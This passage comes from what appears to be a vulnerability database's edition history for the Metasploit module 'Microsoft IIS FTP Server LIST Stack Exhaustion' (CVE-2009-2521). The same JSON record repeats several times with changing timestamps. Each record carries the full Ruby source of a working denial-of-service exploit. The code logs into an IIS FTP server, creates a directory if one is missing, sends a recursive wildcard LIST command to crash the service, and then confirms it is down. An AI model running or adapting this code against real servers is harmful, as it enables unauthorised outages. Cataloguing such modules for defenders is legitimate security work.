["modified", "published"], "edition": 32}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-02-26T19:00:33", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 2.6, "modified": "2018-02-26T19:00:33"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-02-26T19:00:33", "differentElements": ["modified", "published"], "edition": 33}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-03-04T01:09:48", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 2.6, "modified": "2018-03-04T01:09:48"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-03-04T01:09:48", "differentElements": ["modified", "published"], "edition": 34}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-03-04T03:02:32", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 2.6, "modified": "2018-03-04T03:02:32"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-03-04T03:02:32", "differentElements": ["modified", "published"], "edition": 35}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-03-04T23:02:39", "history": [], "viewCount": 44, "enchantments": {"score": {"value": 2.6, "modified": "2018-03-04T23:02:39"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-03-04T23:02:39", "differentElements": ["modified", "published"], "edition": 36}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-03-05T03:03:10", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 2.6, "modified": "2018-03-05T03:03:10"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-03-05T03:03:10", "differentElements": ["modified", "published"], "edition": 37}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "1976-01-01T00:00:00", "modified": "1976-01-01T00:00:00", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-03-10T07:06:00", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 2.6, "modified": "2018-03-10T07:06:00"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and there is no single directory, a new directory with random name will be\n created prior to sending exploit payload.\n },\n 'Author' =>\n [\n 'Kingcope', # Initial discovery\n 'Myo Soe' # Metasploit Module (http://yehg.net)\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'CVE', '2009-2521'],\n [ 'BID', '36273'],\n [ 'OSVDB', '57753'],\n [ 'MSB', 'MS09-053'],\n [ 'URL', 'https://www.microsoft.com/technet/security/Bulletin/MS09-053.mspx'],\n [ 'URL', 'http://archives.neohapsis.com/archives/fulldisclosure/2009-09/0040.html']\n ],\n 'DisclosureDate' => 'Sep 03 2009'))\n end\n\n def run\n # Attempt to crash IIS FTP\n begin\n return unless connect_login\n print_status('Checking if there is at least one directory ...')\n res = send_cmd_data(['ls'],'')\n\n if res.to_s =~ /\\<DIR\\> / then\n print_status('Directory found, skipped creating a directory')\n else\n print_status('No single directory found')\n print_status('Attempting to create a directory ...')\n new_dir = Rex::Text.rand_text_alphanumeric(6)\n res = send_cmd(['mkd',new_dir])\n if res =~ /directory created/ then\n print_status(\"New directory \\\"#{new_dir}\\\" was created!\")\n else\n print_error('Write-access was denied')\n print_error('Exploit failed')\n disconnect\n return\n end\n end\n\n print_status(\"Sending DoS packets ...\")\n res = send_cmd_datax(['ls','-R */../'],' ')\n disconnect\n rescue ::Interrupt\n raise $!\n rescue ::Rex::ConnectionRefused\n print_error(\"Cannot connect. The server is not running.\")\n return\n rescue Rex::ConnectionTimeout\n print_error(\"Cannot connect. The connection timed out.\")\n return\n rescue\n end\n\n #More careful way to check DOS\n print_status(\"Checking server's status...\")\n begin\n connect_login\n disconnect\n print_error(\"DOS attempt failed. The service is still running.\")\n rescue\n print_good(\"Success! Service is down\")\n end\n end\n\n # Workaround: modified send_cmd_data function with short sleep time before data_disconnect call\n # Bug Tracker: 4868\n def send_cmd_datax(args, data, mode = 'a', nsock = self.sock)\n args[0] = \"LIST\"\n # Set the transfer mode and connect to the remove server\n return nil if not data_connect(mode)\n # Our pending command should have got a connection now.\n res = send_cmd(args, true, nsock)\n # make sure could open port\n return nil unless res =~ /^(150|125) /\n # dispatch to the proper method\n begin\n data = self.datasocket.get_once(-1, ftp_timeout)\n rescue ::EOFError\n data = nil\n end\n select(nil,nil,nil,1)\n # close data channel so command channel updates\n data_disconnect\n # get status of transfer\n ret = nil\n ret = recv_ftp_resp(nsock)\n ret = [ ret, data ]\n ret\n end\nend\n", "metasploitReliability": "Normal", "metasploitHistory": "https://github.com/rapid7/metasploit-framework/commits/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb"}, "lastseen": "2018-03-10T07:06:00", "differentElements": ["modified", "published"], "edition": 38}, {"bulletin": {"id": "MSF:AUXILIARY/DOS/WINDOWS/FTP/IIS_LIST_EXHAUSTION", "hash": "", "type": "metasploit", "bulletinFamily": "exploit", "title": "Microsoft IIS FTP Server LIST Stack Exhaustion", "description": "This module triggers Denial of Service condition in the Microsoft Internet Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command containing a wildcard. For this exploit to work in most cases, you need 1) a valid ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must be configured as \"manual\" mode in startup type 3) there must be at least one directory under FTP root directory. If your provided an FTP account has write-access privilege and there is no single directory, a new directory with random name will be created prior to sending exploit payload.", "published": "2011-11-26T19:30:35", "modified": "2017-07-24T13:26:21", "cvss": {"score": 2.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}, "href": "", "reporter": "Rapid7", "references": [], "cvelist": ["CVE-2009-2521"], "lastseen": "2018-03-10T09:06:28", "history": [], "viewCount": 45, "enchantments": {"score": {"value": 4.0, "modified": "2018-03-10T09:06:28", "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N/"}}, "objectVersion": "1.4", "sourceHref": "https://github.com/rapid7/metasploit-framework/blob/master/modules/auxiliary/dos/windows/ftp/iis_list_exhaustion.rb", "sourceData": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Auxiliary\n include Msf::Exploit::Remote::Ftp\n include Msf::Auxiliary::Dos\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'Microsoft IIS FTP Server LIST Stack Exhaustion',\n 'Description' => %q{\n This module triggers Denial of Service condition in the Microsoft Internet\n Information Services (IIS) FTP Server 5.0 through 7.0 via a list (ls) -R command\n containing a wildcard. For this exploit to work in most cases, you need 1) a valid\n ftp account: either read-only or write-access account 2) the \"FTP Publishing\" must\n be configured as \"manual\" mode in startup type 3) there must be at least one\n directory under FTP root directory. If your provided an FTP account has write-access\n privilege and 